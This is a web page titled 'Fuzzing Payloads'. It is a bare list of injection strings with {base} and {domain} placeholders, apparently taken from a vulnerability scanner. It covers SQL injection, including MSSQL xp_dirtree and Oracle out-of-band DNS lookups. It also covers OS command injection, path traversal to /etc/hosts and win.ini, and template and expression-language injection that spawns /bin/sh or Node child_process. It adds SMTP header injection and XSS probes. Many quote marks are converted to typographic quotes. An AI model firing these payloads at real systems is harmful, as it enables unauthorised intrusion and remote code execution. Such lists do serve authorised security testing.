Skip to content

Fuzzing Payloads

\
\\
{base}-0
{base}*1
{base}’||’
{base}’+’
{base}’ ‘
“”
{base}”||”
{base}/*_*/
‘{base}’
“{base}”
({base})
`
{base}’–
{base}’)–
{base}’))–
{base}’#
{base}’)#
{base}’))#
{base}’ and ‘z’=’z
{base}’ or ‘z’=’z
{base}” or “z”=”z
}}
${77*77}
{{77*77}}
xsstest'”><
/{base}
./{base}
../{base}
/./{base}
/../{base}
xxx/../{base}
{base}::$DATA
../../../../../../../../../../../../etc/hosts
..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini
{base}))))))))))
{base}|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
{base}| ping -i 30 127.0.0.1 |
{base}| ping -n 30 127.0.0.1 |
{base}& ping -i 30 127.0.0.1 &
{base}& ping -n 30 127.0.0.1 &
{base}; ping -c 5 127.0.0.1 ;
{base}%0a ping -i 30 127.0.0.1 %0a
`ping -c 5 127.0.0.1`
{base}| id
{base}& id
{base}; id
`id`
;echo 111111
echo 111111
response.write 111111
:response.write 111111
http:///
%0aCc:
%0d%0aCc:
%0aBcc:
%0d%0aBcc:
{base}%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
{base}”,”x”:”
{base}”],”x”:[“
{base},”x”:1
{base}” a=”
{base}” xmlns:xsi=”
{base} a=””
{base}’ a=’
{base}’ xmlns:xsi=’
{base}
{base}
xsstest
xsstest%00″<>’
{77*77}
{{{77*77}}}
${{77*77}}
#{77*77}
[[77*77]]
{{=77*77}}
[[${77*77}]]
<%=77*77%>
${xyz|77*77}
#set($x=77*77)${x}
@(77*77)
${#ctx.getClass()}
<#assign xy=”zxxxxxxz”><#assign yx=”zyyyyyyz”>${yx}${xy}
nslookup {domain}&
`nslookup {domain}`
|nslookup {domain}&
‘”`0&nslookup {domain}&`’
&nslookup -q=cname {domain}&’\”`0&nslookup {domain}&`’
+eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)+’
eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)
“+eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)+”
‘+eval(compile(‘for x in range(1):\n import socket\n socket.gethostbyname(“{domain}”)’,’a’,’single’))+’
eval(compile(‘for x in range(1):\n import socket\n socket.gethostbyname(“{domain}”)’,’a’,’single’))
gethostbyname(‘{domain}’)
‘.gethostbyname(‘{domain}’).’
‘.gethostbyname(“{domain}”).’
{${gethostbyname(“{domain}”)}}
require(‘child_process’).exec(‘nslookup {domain}’)
‘-require(‘child_process’).exec(‘nslookup {domain}’)-‘
“-require(“child_process”).exec(“nslookup {domain}”)-“
<% require(‘child_process’).exec(‘nslookup {domain}’); %>
<% require(“child_process”).exec(“nslookup {domain}”); %>
||UTL_INADDR.get_host_address(‘{domain}’)
‘||UTL_INADDR.get_host_address(‘{domain}’)||’
||extractvalue(xmltype(‘%xxx;]>’),’/l’)
‘||extractvalue(xmltype(‘%xxx;]>’),’/l’)||’
UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain}))
or chr(1)=UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain}))
extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l))
or chr(1)=extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l))
(select load_file(‘\\\\{domain}\\c’))
‘+(select load_file(‘\\\\{domain}\\e’))+’
;EXEC master..xp_dirtree ‘\\{domain}\s’–
1;EXEC master..xp_dirtree ‘\\{domain}\s’–
‘;EXEC master..xp_dirtree ‘\\{domain}\s’–
‘);EXEC master..xp_dirtree ‘\\{domain}\s’–
;EXEC master..xp_dirtree “\\{domain}\s”–
1;EXEC master..xp_dirtree “\\{domain}\s”–
“;EXEC master..xp_dirtree “\\{domain}\s”–
“);EXEC master..xp_dirtree “\\{domain}\s”–
“=”;EXEC master..xp_dirtree “\\{domain}\s”–
“=”);EXEC master..xp_dirtree “\\{domain}\s”–
;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
1;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
‘;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
‘);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
“;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
“);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
“=”;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
“=”);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
\’;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
\”;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)–
rmi://{domain}/go
ldap://{domain}/cn=bar,dc=test,dc=org
” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance&#8221; xsi:noNamespaceSchemaLocation=”http://{domain}/x.xsd
%xx;]>
*/–>”‘>
*/–>”‘>
“–>’–>`–>
javascript:/*
<#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“nslookup {domain}”) }
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,””,self::clearConfig())}
{domain}
http://{domain}
https://{domain}
%20{!xmlparser v=”}%20
” {!xmlparser v=”} “
“) {!xmlparser v=”} (“
&shards={domain}/sr
#{“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}
}#{“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}#{
#{”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}
}#{”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}#{
${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}
}${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}${
${”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}
}${”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}${